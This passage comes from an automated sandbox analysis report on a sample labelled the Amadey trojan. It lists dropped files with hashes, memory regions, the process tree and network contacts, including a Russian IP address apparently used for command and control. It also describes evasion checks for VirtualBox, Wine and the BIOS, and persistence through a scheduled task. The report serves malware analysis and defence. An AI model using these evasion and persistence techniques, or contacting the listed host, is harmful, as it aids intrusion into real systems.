SHA512 4c430686f61843fc17c67fa8e78357f576620937137b7153bd2da4cc4f73a104130c221f24fb8060a767eac178bb6b319763b964eeffaa339b73cce444286490

memory/4308-439-0x0000000000270000-0x000000000071D000-memory.dmp

memory/1928-440-0x0000000000720000-0x0000000000D1A000-memory.dmp

memory/5200-441-0x000001B0824C0000-0x000001B083112000-memory.dmp

memory/6096-442-0x0000000140000000-0x000000014159C000-memory.dmp

memory/6096-447-0x0000000140000000-0x000000014159C000-memory.dmp

memory/6096-448-0x0000000140000000-0x000000014159C000-memory.dmp

memory/6096-450-0x0000000140000000-0x000000014159C000-memory.dmp

memory/6096-449-0x0000000140000000-0x000000014159C000-memory.dmp

C:\Windows\System32\GroupPolicy\gpt.ini

MD5 8ef9853d1881c5fe4d681bfb31282a01
SHA1 a05609065520e4b4e553784c566430ad9736f19f
SHA256 9228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2
SHA512 5ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005

memory/1124-458-0x0000000007940000-0x0000000007C02000-memory.dmp

memory/1124-459-0x00000000046C0000-0x00000000046C6000-memory.dmp

memory/1928-463-0x0000000000720000-0x0000000000D1A000-memory.dmp

memory/4308-462-0x0000000000270000-0x000000000071D000-memory.dmp

memory/1984-461-0x0000000000DF0000-0x00000000012B3000-memory.dmp

memory/6096-464-0x0000000140000000-0x000000014159C000-memory.dmp

memory/1124-466-0x00000000063D0000-0x00000000063EA000-memory.dmp

memory/1124-477-0x0000000006400000-0x0000000006406000-memory.dmp

C:\Users\Admin\Pictures\1sV0V74o6XuxHDx0lr3ZwrZy.exe

MD5 08063da816c5db77ce64807c4ec2f7e8
SHA1 61ded712f36458ba6ffcec37edbf65d5927d2d92
SHA256 dd08b1356c9b9bffe1ae9c254d28411890204e5b8fe1f9b9af0a7a3e5b6ed61e
SHA512 df74cef767efde4711af6e40ef82801d91c4f1b5805fb0411235272a62fd08204d39153d4ae2056880d9d3ceaaae9c8e87254ea57d35a83bf501ac5be721c5f0

C:\Users\Admin\AppData\Local\Temp\7zSE9DE.tmp\Install.exe

MD5 7d1dd60c4b8fb4167645f7093801b6d9
SHA1 4ae1feb130e57f803ef00709419e6226b7c0e54d
SHA256 1c62508e00e567d8f753734590a0a303acad2877681173cb4eed2e1a8409f3e9
SHA512 7904bcaefe3d2f0e643f24a2e1eb6f0079e28d7df15f7be0fcd73ecc76680a9a677fe199d8a4d80d08144adbd4769d2a14eac2f933404aeeec05fe103429e872

C:\Users\Admin\AppData\Local\Temp\7zSED68.tmp\Install.exe

MD5 0550ef6afda33ea1c1a231b939ca9b07
SHA1 f74897166553b218e3a0869502ed036f175be9cd
SHA256 8462d8b0433559e9afc2cd5de7bffe38fc6b82e3da9e79bdd33a85ab79fafaeb
SHA512 329fa4ba439852740683dfb60070116fc459785d8a936e59aa4e55affe4697d66c5db844d154b30ab41913342fd5d51760f329cf30dc039387d0929026219a2e

memory/1928-495-0x0000000000720000-0x0000000000D1A000-memory.dmp

memory/4308-494-0x0000000000270000-0x000000000071D000-memory.dmp

memory/5780-497-0x0000000002CF0000-0x0000000002D26000-memory.dmp

memory/5780-498-0x0000000005A80000-0x00000000060A8000-memory.dmp

memory/5780-500-0x0000000005710000-0x0000000005776000-memory.dmp

memory/5780-499-0x0000000005670000-0x0000000005692000-memory.dmp

memory/5780-510-0x00000000061B0000-0x0000000006504000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 cadef9abd087803c630df65264a6c81c
SHA1 babbf3636c347c8727c35f3eef2ee643dbcc4bd2
SHA256 cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438
SHA512 7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

memory/5780-513-0x0000000006A00000-0x0000000006A4C000-memory.dmp

memory/5780-512-0x0000000006620000-0x000000000663E000-memory.dmp

memory/5916-514-0x0000000010000000-0x00000000105DF000-memory.dmp

memory/5780-517-0x0000000007630000-0x00000000076C6000-memory.dmp

memory/5780-519-0x0000000006B40000-0x0000000006B62000-memory.dmp

memory/5780-518-0x0000000006AF0000-0x0000000006B0A000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 5315900105942deb090a358a315b06fe
SHA1 22fe5d2e1617c31afbafb91c117508d41ef0ce44
SHA256 e8bd7d8d1d0437c71aceb032f9fb08dd1147f41c048540254971cc60e95d6cd7
SHA512 77e8d15b8c34a1cb01dbee7147987e2cc25c747e0f80d254714a93937a6d2fe08cb5a772cf85ceb8fec56415bfa853234a003173718c4229ba8cfcf2ce6335a6

memory/3756-532-0x0000000005EA0000-0x00000000061F4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 67ab0482c7b8ee2440c9f6d4303d0982
SHA1 0d52e9eecb6055958acb300117b1e108ebda6ae5
SHA256 247daa4e0aa7a21950ecce2335c518abe947123b6a9db9606529a8c2c7ed3d66
SHA512 d396b51aaa81772fc0e65c0acfb4740803f61d95ee2059b22b1fb445a6e3e22bf9e9412a5fab6bb2ed83a33859aa137e5a6340e02afd0ce4cd5c397174b849ef

memory/1984-534-0x0000000000DF0000-0x00000000012B3000-memory.dmp

memory/3756-535-0x0000000006900000-0x000000000694C000-memory.dmp

memory/4308-539-0x0000000000270000-0x000000000071D000-memory.dmp

memory/1928-540-0x0000000000720000-0x0000000000D1A000-memory.dmp

memory/3120-548-0x0000000004850000-0x0000000004BA4000-memory.dmp

memory/3120-553-0x00000000053C0000-0x000000000540C000-memory.dmp

memory/1984-554-0x0000000000DF0000-0x00000000012B3000-memory.dmp

memory/1928-557-0x0000000000720000-0x0000000000D1A000-memory.dmp

memory/232-558-0x0000000010000000-0x00000000105DF000-memory.dmp

C:\Windows\system32\GroupPolicy\Machine\Registry.pol

MD5 cdfd60e717a44c2349b553e011958b85
SHA1 431136102a6fb52a00e416964d4c27089155f73b
SHA256 0ee08da4da3e4133e1809099fc646468e7156644c9a772f704b80e338015211f
SHA512 dfea0d0b3779059e64088ea9a13cd6b076d76c64db99fa82e6612386cae5cda94a790318207470045ef51f0a410b400726ba28cb6ecb6972f081c532e558d6a8

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 def65711d78669d7f8e69313be4acf2e
SHA1 6522ebf1de09eeb981e270bd95114bc69a49cda6
SHA256 aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c
SHA512 05b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 39aa6cd3b5015789a2a22d1ac942563a
SHA1 df7ed2b033b646c1624516a15a9d2789f124531d
SHA256 2c11c872d32be7869ce0694b3170c69c843e59f31d6d2207dbf826a5b911bc7b
SHA512 ab5b9bd9fbf742c1f98c8ce3624f2caed47f5e50d710c69b3957fb938a6cd45581175cd4e3277f26701332c627c1b47dcb7f1920b2504cf947833894d5fa8e75

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2d0862fb76dd8c5a31122fbb8c28b5a1
SHA1 5911c3986855c490e530629976a661f611e50ca4
SHA256 2774b98bb9892ab2b92926a50313dfde327c41f36e3e9292d30fdfcde5b0443a
SHA512 1f5089433fbf629dc460d29d0f3e4defc62991055d7b9f4bd5519cbadbb63862554f1d393fa35fd569568c714f068549391896e608ab286de6401494b34c4c17

memory/4308-584-0x0000000000270000-0x000000000071D000-memory.dmp

memory/1928-585-0x0000000000720000-0x0000000000D1A000-memory.dmp

C:\Windows\system32\GroupPolicy\gpt.ini

MD5 a62ce44a33f1c05fc2d340ea0ca118a4
SHA1 1f03eb4716015528f3de7f7674532c1345b2717d
SHA256 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA512 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 60176103a784ed7680a938725aec2298
SHA1 88364284348a7d03e5dea2509992fec19399072f
SHA256 9b23d32ebb32a97605019bae68c009d1ab4be5e71359a562b45c3b4adb72d574
SHA512 7e76e824d48e2a1ffee55e8dc720d49e06841ff43f33e268d1f13d85c4e2e4ef2f8a4e401201a8356e566f99f5300bf5dde55afd0dd4e4f87d9e419611e218d2

memory/1984-602-0x0000000000DF0000-0x00000000012B3000-memory.dmp

memory/1928-604-0x0000000000720000-0x0000000000D1A000-memory.dmp

memory/5272-605-0x0000000000400000-0x000000000045C000-memory.dmp

memory/5272-606-0x0000000000400000-0x000000000045C000-memory.dmp

memory/4308-607-0x0000000000270000-0x000000000071D000-memory.dmp

memory/1984-609-0x0000000000DF0000-0x00000000012B3000-memory.dmp

memory/5272-611-0x0000000000400000-0x000000000045C000-memory.dmp

memory/4556-648-0x0000000000270000-0x000000000071D000-memory.dmp

memory/5608-649-0x0000000000DF0000-0x00000000012B3000-memory.dmp

memory/5608-651-0x0000000000DF0000-0x00000000012B3000-memory.dmp

memory/4556-653-0x0000000000270000-0x000000000071D000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9d37106a4056ee605e1c9954255758c7
SHA1 60cf0a78527250965ccc7a70b93474a8bc1bea57
SHA256 97edfef15da0f0fed370a01ebeb937e0eeee76dc1636104ec4149888b3a8e6ce
SHA512 e3914044631f981d268959ed3f1836f7cbb69854cb6fd89c79d45785eec916137740362c5a39629cd5fb64087dc662e418bf0820bbee40374791e096a0b51cf0

C:\$RECYCLE.BIN\S-1-5-18\desktop.ini

MD5 a526b9e7c716b3489d8cc062fbce4005
SHA1 2df502a944ff721241be20a9e449d2acd07e0312
SHA256 e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066
SHA512 d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c3d997313aefe741fedb90ebc4edde1e
SHA1 edd02eae3d8a7baea8020e6b2c86d2840122ac85
SHA256 19f4cbeff9e5f1b81908a7c25df9eadb5a57ae669be0f33c9668ebf0427bf726
SHA512 2a2ccb67ab6363d238a48800f41ac80935212ab227455c31d62517cae4541acfe28b7a23b9e16e4904b94124af45f270367b7c6500f46951a2a61f44ae8235cd

C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

MD5 8697c038b56ee3aee54b92b5024f89b4
SHA1 f6bb036398b73dfbf1153a163fa764f989174e44
SHA256 6bec6bd5b28406a540b3d18bffe2cce45022fb260803e7eb420bb00bb86450e4
SHA512 9863f1b4afca249425be8f0bcf7a2409f63d33e9b56885c9d8c64065fe31f38fe5d992d2528ab0d78b4ec2a25731439eceb5b20de0ca1ae883d0e457f8f1d29d

memory/6136-728-0x0000000004C70000-0x0000000004CBC000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

MD5 238d2612f510ea51d0d3eaa09e7136b1
SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Windows\system32\GroupPolicy\Machine\Registry.pol

MD5 0a48000b0ebb8e94be299edc703328fe
SHA1 02c746f931d1bc73303e8b0fa42eb5cb9bc9cc52
SHA256 81d9b12cf4c7aeb97fff5d5616bd36e230c3cd69397f2ad1c962582f1072dd47
SHA512 01aeeb4e8417c5784c069bcd7511edec7091274a9bd4e9137152d5e18b11ec7c242253983d1d8732dda72c82a9ca46f06696525a6235b41bea04ddd58fa1c0c1

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

MD5 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1 6a51537cef82143d3d768759b21598542d683904
SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

MD5 2a1e12a4811892d95962998e184399d8
SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json

MD5 bd6b60b18aee6aaeb83b35c68fb48d88
SHA1 9b977a5fbf606d1104894e025e51ac28b56137c3
SHA256 b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA512 3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

C:\Program Files (x86)\JipyTrDkU\IybSyoS.xml

MD5 3399a172bdd15610616a19481f631e1e
SHA1 ad395a0e6666532e2b3d015bb42862508e33ff85
SHA256 388f67c3c2719ebe0d7882f5d9e82e51555474d6954313f934f8a929615edf4e
SHA512 210200efa5808c0fe5b8eb9e95c9fcbe7558e9abe52d97995347816b8f29e7a00821654ea6ebe969ebe474afea2da73136183d1c98bffb20cb07c5c3e1450b13

C:\Users\Admin\AppData\Local\Packages\favicon.png

MD5 1603865df23efcd1dc421a48f090b2d5
SHA1 29c835478c413295787656da1201a3bd08582267
SHA256 fc48da13fe7501b9a08daced7a7fadc6914a36c6c12461a73d2170d748be5712
SHA512 e9bca0319aa1cacdd86a3b5b5904cd508a245e64399acf335299b298feec130985b68ad3456b177aa466284c6239e952aa15ed0e6545ae6ad72848d3ea6405b1

memory/5200-1060-0x000001B09CFF0000-0x000001B09CFFA000-memory.dmp

memory/5200-1059-0x000001B09D000000-0x000001B09D012000-memory.dmp

C:\Program Files (x86)\tegRANPZONsU2\wojZtnp.xml

MD5 c37d3061328fe881942d1fed10162551
SHA1 8388d7f234f7a634da08a64c1a39cd5681de8b0a
SHA256 672edf87fa5e034aabf4de04bf5e89b7f2da5b95523314945001de1ca659668d
SHA512 17139f0a804fa54decafa59d1f04ddbe5ece5e4bd63a3600070dd12d1d6ec34fba7ebb0fd291f1f0f11b4084244167be9d1729be4a3591682aad3f8056f69dd1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n9vxbo99.default-release\prefs.js

MD5 1c8695deaf2ddc855c755dc362247d32
SHA1 b7068343a8cdaab8fe1cf0038ab7250bba869b1e
SHA256 63475b7737aa00ab765e7b39127f89345bbe99f493253a9b81e084152e4c7261
SHA512 a068da8a531d0f95e6fa56bfbbfb358fcbab38e559d941603e168d4339991939e8f6fd3146fb055a51f0c26555487fc0f3bfe3803eaf4caf2e702827631b6461

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 6665488cb07e358b79177c86a8c41fd4
SHA1 03f8be1bfe5c880f3bce2b78938547653ebfef95
SHA256 c45d4ecd8da9d45cb8478dade5f8b003bae0373e2f86967fa58b9f9ad1801068
SHA512 91d801fb945c2acf20240afbba8e37bc2a8af412441a414bfc761dc26ca603ed98441c1b54d5382f41eaeaa17d34cddd5c16b78bc2c3ec4a22e351f6fa8179e8

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 a093f71580f3d39395a3eefdf3a2caa1
SHA1 d12cd1418250daa5ca13f9aa8f74e10fe404b9bf
SHA256 a3591ce53b72e7e425e325c3681f777410e6bc96a21d1cde058fe552f3fed713
SHA512 a7a55e762479e6691be446176b9e9351fb01b5353f5beb15b5b08b190e5af0aa28f2975b38a6212c26108c8174d01465ec3f9a6312b525c024e88312a12cf938

memory/3708-1164-0x0000000000400000-0x000000000046E000-memory.dmp

memory/3708-1167-0x00000000083E0000-0x000000000842C000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-30 02:40

Reported

2024-05-30 02:42

Platform

win11-20240426-en

Max time kernel

144s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\06017fe4a67a0208ed4f7d47eb8429890ce13032d19e1e7c003798bbc29750c8.exe"

Signatures

Amadey

trojan amadey

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\06017fe4a67a0208ed4f7d47eb8429890ce13032d19e1e7c003798bbc29750c8.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\06017fe4a67a0208ed4f7d47eb8429890ce13032d19e1e7c003798bbc29750c8.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\06017fe4a67a0208ed4f7d47eb8429890ce13032d19e1e7c003798bbc29750c8.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2994005945-4089876968-1367784197-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\06017fe4a67a0208ed4f7d47eb8429890ce13032d19e1e7c003798bbc29750c8.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2994005945-4089876968-1367784197-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2994005945-4089876968-1367784197-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2994005945-4089876968-1367784197-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\explortu.job C:\Users\Admin\AppData\Local\Temp\06017fe4a67a0208ed4f7d47eb8429890ce13032d19e1e7c003798bbc29750c8.exe N/A

Enumerates physical storage devices

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\06017fe4a67a0208ed4f7d47eb8429890ce13032d19e1e7c003798bbc29750c8.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\06017fe4a67a0208ed4f7d47eb8429890ce13032d19e1e7c003798bbc29750c8.exe

"C:\Users\Admin\AppData\Local\Temp\06017fe4a67a0208ed4f7d47eb8429890ce13032d19e1e7c003798bbc29750c8.exe"

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe

"C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe

Network

Country Destination Domain Proto
RU 147.45.47.155:80 147.45.47.155 tcp
US 8.8.8.8:53 155.47.45.147.in-addr.arpa udp
IE 52.111.236.21:443 tcp

Files

memory/232-0-0x0000000000210000-0x00000000006D3000-memory.dmp

memory/232-1-0x0000000077696000-0x0000000077698000-memory.dmp

memory/232-2-0x0000000000211000-0x000000000023F000-memory.dmp

memory/232-3-0x0000000000210000-0x00000000006D3000-memory.dmp

memory/232-5-0x0000000000210000-0x00000000006D3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe

MD5 c61e453e041187460ae78a855542277a
SHA1 e45ee70d1dd37142ab6f9c298008f6e99a705c1b
SHA256 06017fe4a67a0208ed4f7d47eb8429890ce13032d19e1e7c003798bbc29750c8
SHA512 b49d785316e1928b25a2e56bbc5343caedb529aeb563c21013483904a1f4d6a6bec61a744ecf124a3b82cfd7aa51d569b823ad9523b5fbacf15d58afb4d4baf7

memory/232-17-0x0000000000210000-0x00000000006D3000-memory.dmp

memory/3476-18-0x0000000000B50000-0x0000000001013000-memory.dmp

memory/3476-19-0x0000000000B51000-0x0000000000B7F000-memory.dmp

memory/3476-20-0x0000000000B50000-0x0000000001013000-memory.dmp

memory/3476-21-0x0000000000B50000-0x0000000001013000-memory.dmp

memory/3476-22-0x0000000000B50000-0x0000000001013000-memory.dmp

memory/3476-23-0x0000000000B50000-0x0000000001013000-memory.dmp

memory/3476-24-0x0000000000B50000-0x0000000001013000-memory.dmp

memory/3476-25-0x0000000000B50000-0x0000000001013000-memory.dmp

memory/3476-26-0x0000000000B50000-0x0000000001013000-memory.dmp

memory/3476-27-0x0000000000B50000-0x0000000001013000-memory.dmp

memory/5092-29-0x0000000000B50000-0x0000000001013000-memory.dmp

memory/5092-30-0x0000000000B50000-0x0000000001013000-memory.dmp

memory/5092-31-0x0000000000B50000-0x0000000001013000-memory.dmp

memory/5092-32-0x0000000000B50000-0x0000000001013000-memory.dmp

memory/3476-33-0x0000000000B50000-0x0000000001013000-memory.dmp

memory/3476-34-0x0000000000B50000-0x0000000001013000-memory.dmp

memory/3476-35-0x0000000000B50000-0x0000000001013000-memory.dmp

memory/3476-36-0x0000000000B50000-0x0000000001013000-memory.dmp

memory/3476-37-0x0000000000B50000-0x0000000001013000-memory.dmp

memory/3476-38-0x0000000000B50000-0x0000000001013000-memory.dmp

memory/4708-40-0x0000000000B50000-0x0000000001013000-memory.dmp

memory/4708-41-0x0000000000B50000-0x0000000001013000-memory.dmp

memory/3476-42-0x0000000000B50000-0x0000000001013000-memory.dmp

memory/3476-43-0x0000000000B50000-0x0000000001013000-memory.dmp

memory/3476-44-0x0000000000B50000-0x0000000001013000-memory.dmp

memory/3476-45-0x0000000000B50000-0x0000000001013000-memory.dmp